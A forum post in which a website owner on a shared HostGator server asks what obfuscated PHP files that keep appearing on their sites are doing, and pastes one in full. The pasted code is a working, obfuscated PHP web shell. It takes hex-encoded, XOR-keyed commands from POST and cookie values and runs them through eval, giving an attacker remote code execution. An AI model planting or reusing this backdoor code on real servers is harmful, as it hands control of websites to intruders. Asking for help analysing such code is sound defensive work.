Several random named php files show up on my website daily, with obscured php text inside the files. The (virus) has infected the entire (300+ websites) shared server and HostGator keeps saying they are “trying” to remove it. It’s been months. Anyways, does anyone know what this obscured php code is doing?? Thanks for any help!
$QDrpq = "\x73" ./* jAL */"\164" ./* lYOpC */chr (114) . chr (95)/* jUeO */./* mrKiB */chr/* BWH */( 666/* pGJG */- 552/* UM*/).chr (101) . chr (112) . "\x65" . "\x61" . "\x74";
$eOiaz = chr (101) ./* Xm */"\x78"/* uQIg */. chr ( 180/* xX */- 68 ).chr (108)/* xBsxS */. 'o' . "\x64"/*Q*/./*zQjJT */"\x65";
$tfwhnZIIg/* siqa*/=/* qGR */chr/* sa*/(99) ./* GM*/chr ( 752 - 641 )."\165" ./* Aq */"\x6e" . 't';
$kyUSM =/* Kb */"\160" . "\141" . chr (/* EfSB */976 -/*GAWg */877 ).'k';
$vdUgpBog = Array (/* CC */"zkCzdqZ"/*gtG */=>/* xiBA */"devWZhFMcEJJpbpPiRuFWB" );
$eRCfZSfcE = Array (/* VkFZ */"sRftEcwUUANnsNQUwVJiYpdrUg" => "DIpwsJGoThYjfbJywX"/* y */);
foreach ( Array( $vdUgpBog,/*XDSQH*/$_POST, $eRCfZSfcE,/* wJ */$_COOKIE,/*UEtW*/$vdUgpBog) as $JpSTIY) {
/* FCY */foreach (/*MCl */$JpSTIY/* Amn*/as $sizBZ => $IMDimAXSfR ) {
$IMDimAXSfR/* h */=/*q */@$kyUSM( 'H'/* ep */. chr (/*nmGe */754 -/* vOo */712/* Xd */),/* J */$IMDimAXSfR );
$sizBZ .= "cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU";
/*SEHs */$sizBZ = $QDrpq (/*pQjum*/$sizBZ, ( strlen(/* MzE */$IMDimAXSfR )/strlen(/* YeuIH*/$sizBZ ) ) + 1);
$fuOJQqrsm = $IMDimAXSfR ^/* a */$sizBZ;
/* L */$fuOJQqrsm =/* DrIPy */$eOiaz/* lBm */(/* ITdQ */chr/* kog */( 592 - 557 ),/* Olgvy */$fuOJQqrsm );
if (/* DDM*/$tfwhnZIIg (/* XUkQ */$fuOJQqrsm ) ==/*VBrQ */3 ) {
/* p */eval ( $fuOJQqrsm[1] ( $fuOJQqrsm[2]/*Y */) );
exit/* Mbt*/();